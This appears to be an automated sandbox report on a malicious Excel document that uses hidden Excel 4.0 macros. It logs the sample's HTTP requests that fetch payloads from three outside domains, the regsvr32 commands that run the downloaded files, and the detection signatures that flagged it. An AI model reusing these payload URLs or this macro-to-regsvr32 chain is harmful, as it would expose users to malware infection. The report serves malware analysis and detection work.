Loading ...

Play interactive tourEdit tour

Windows Analysis Report doc-220808714.xls

Overview

General Information

Sample Name:doc-220808714.xls
Analysis ID:501226
MD5:2654fdca7197f542cbd0be823a2a2a9f
SHA1:149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
SHA256:f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5028 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5252 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4440 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3328 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
doc-220808714.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x384aa:$s1: Excel
  • 0x39557:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
doc-220808714.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 5252
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 5252

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: doc-220808714.xlsVirustotal: Detection: 13%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.5:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.5:49756 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.5:49761 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.5:49745 -> 172.93.99.178:443
    Source: global trafficDNS query: name: ohemaa.org
    Source: global trafficTCP traffic: 192.168.2.5:49745 -> 172.93.99.178:443
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: amerident.com.doConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 172.93.99.178 172.93.99.178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.aadrm.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.cortana.ai
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.office.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.onedrive.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://augloop.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cdn.entity.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cortana.ai
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cortana.ai/api
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://cr.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://directory.services.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://graph.windows.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://graph.windows.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://login.windows.local
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://management.azure.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://management.azure.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://messaging.office.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://officeapps.live.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://onedrive.live.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://osi.office.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office365.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://roaming.edog.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://settings.outlook.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://tasks.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
